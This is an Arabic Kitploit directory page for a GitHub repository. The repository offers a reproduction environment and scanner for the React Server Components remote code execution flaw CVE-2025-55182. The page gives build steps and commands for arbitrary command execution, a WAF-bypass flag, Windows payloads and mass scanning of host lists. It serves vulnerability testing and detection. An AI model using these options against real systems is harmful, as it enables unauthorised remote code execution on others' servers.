Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — بيئة إعادة إنتاج CVE-2025-55182 وPoC لصدى RCE | Kitploit
أدوات/GitHubGitHub/zzhorc/cve-2025-55182
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتجاوز WAFأمن الويباختبار الاختراق
GitHubzzhorc/cve-2025-55182

CVE-2025-55182

بيئة إعادة إنتاج CVE-2025-55182 وPoC لصدى RCE

عرض المستودع
726منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الإصدارات المتأثرة

المكوّنالإصدار الموصى به لإعادة الإنتاجنطاق الإصدارات المعرضة للخطر
Node.js>= 20.9.020.9.0 (LTS) وما فوق
Next.js15.0.015.x, 16.x(App Router)
React Core19.0.0 أو 19.2.0من 19.0.0 إلى 19.2.0
RSC Bundlerreact-server-dom-webpackمن 19.0.0 إلى 19.2.0

البناء والتشغيل

  1. فرض تثبيت إصدار قديم

    root@kitploit:~
    cd cve-2025-55182-target
    npm install --force
    
  2. التحقق من إصدارات التبعيات

    root@kitploit:~
    npm list react next
    # 确认输出显示 [email protected] 和 [email protected]
    

    طالما أن قائمة التبعيات العليا تعرض [email protected] و [email protected]، تكون البيئة قد تم تثبيتها بنجاح على الحالة المعرضة للخطر، ويمكن تجاهل التحذيرات ورموز الأخطاء هنا.

  3. البناء:

    root@kitploit:~
    npm run build
    
  4. التشغيل:

    root@kitploit:~
    npm start
    

    سيعمل الخادم على http://localhost:3000. اكتمل إعداد البيئة، ويمكنك بدء التحقق من الثغرة.

مثال

  • اكتشاف الثغرة / الفحص:

    root@kitploit:~
    cd React2shell
    python3.11 scanner.py -u http://127.0.0.1:3000/
    
  • RCE:

    root@kitploit:~
    python3.11 scanner_with_rce.py -u http://127.0.0.1:3000/ -c "ls /"
    

    rce

poc

المراجع

react2shell-scanner

react2shell-scanner

أداة سطر أوامر للكشف عن CVE-2025-55182 وCVE-2025-66478 في تطبيقات Next.js التي تستخدم React Server Components.

للاطلاع على التفاصيل التقنية حول الثغرة ومنهجية الكشف، راجع منشور مدونتنا: https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478

كيف يعمل

افتراضيًا، يرسل الماسح طلب POST متعدد الأجزاء مصممًا بعناية يحتوي على حمولة إثبات مفهوم RCE تنفذ عملية حسابية حتمية (41*271 = 11111). تعيد المضيفات المعرضة للخطر النتيجة في ترويسة الاستجابة X-Action-Redirect بالشكل /login?a=11111.

يختبر الماسح المسار الجذر أولاً. إذا لم يكن الهدف معرضًا للخطر، فإنه يتبع عمليات إعادة التوجيه على نفس المضيف (مثل / إلى /en/) ويختبر وجهة إعادة التوجيه. لا يتم اتباع عمليات إعادة التوجيه عبر النطاقات.

وضع الفحص الآمن

تستخدم علامة --safe-check طريقة كشف بديلة تعتمد على مؤشرات القناة الجانبية (رمز حالة 500 مع ملخص خطأ محدد) دون تنفيذ أي كود على الهدف. استخدم هذا الوضع عندما لا يكون تنفيذ RCE مرغوبًا.

تجاوز WAF

تضيف علامة --waf-bypass بيانات عشوائية في بداية جسم طلب multipart. يمكن أن يساعد ذلك في تجاوز فحص محتوى WAF الذي يحلل الجزء الأول فقط من أجسام الطلبات. الحجم الافتراضي هو 128 كيلوبايت، ويمكن ضبطه عبر --waf-bypass-size. عند تمكين تجاوز WAF، يتم زيادة المهلة تلقائيًا إلى 20 ثانية (ما لم يتم ضبطها صراحةً).

وضع ويندوز

تعمل علامة --windows على تبديل الحمولة من قشرة يونكس (echo $((41*271))) إلى PowerShell (powershell -c "41*271") للأهداف التي تعمل على ويندوز.

المتطلبات

  • Python 3.9+
  • requests
  • tqdm

التثبيت

root@kitploit:~
pip install -r requirements.txt

الاستخدام

فحص مضيف واحد:

root@kitploit:~
python3 scanner.py -u https://example.com

فحص قائمة بالمضيفين:

root@kitploit:~
python3 scanner.py -l hosts.txt

الفحص بعدة خيوط وحفظ النتائج:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

الفحص بترويسات مخصصة:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

استخدام كشف القناة الجانبية الآمن:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check

فحص أهداف ويندوز:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

الفحص مع تجاوز WAF:

root@kitploit:~
python3 scanner.py -u https://example.com --waf-bypass

RCE

root@kitploit:~
python3 scanner.py -u https://example.com -c "ls /"

الخيارات

root@kitploit:~
-u, --url         Single URL to check
-c, --cmd         Command to execute
-l, --list        File containing hosts (one per line)
-t, --threads     Number of concurrent threads (default: 10)
--timeout         Request timeout in seconds (default: 10)
-o, --output      Output file for results (JSON)
--all-results     Save all results, not just vulnerable hosts
-k, --insecure    Disable SSL certificate verification
-H, --header      Custom header (can be used multiple times)
-v, --verbose     Show response details for vulnerable hosts
-q, --quiet       Only output vulnerable hosts
--no-color        Disable colored output
--safe-check      Use safe side-channel detection instead of RCE PoC
--windows         Use Windows PowerShell payload instead of Unix shell
--waf-bypass      Add junk data to bypass WAF content inspection
--waf-bypass-size Size of junk data in KB (default: 128)

الاعتمادات

تم الكشف عن إثبات المفهوم RCE في الأصل بواسطة @maple3142 -- نحن ممتنون جدًا لعملهم في نشر إثبات مفهوم يعمل.

تم بناء هذه الأداة في الأصل كطريقة آمنة لاكتشاف RCE. لا تزال هذه الوظيفة متاحة عبر --safe-check، وضع "الاكتشاف الآمن".

  • Assetnote Security Research Team - Adam Kues, Tomais Williamson, Dylan Pindur, Patrik Grobshäuser, Shubham Shah
  • xEHLE_ - انعكاس مخرجات RCE في ترويسة الاستجابة
  • Nagli

المخرجات

تتم طباعة النتائج في الطرفية. عند استخدام -o، يتم حفظ المضيفات المعرضة للخطر في ملف JSON يحتوي على طلب HTTP الكامل والاستجابة للتحقق.

تنزيل الأداة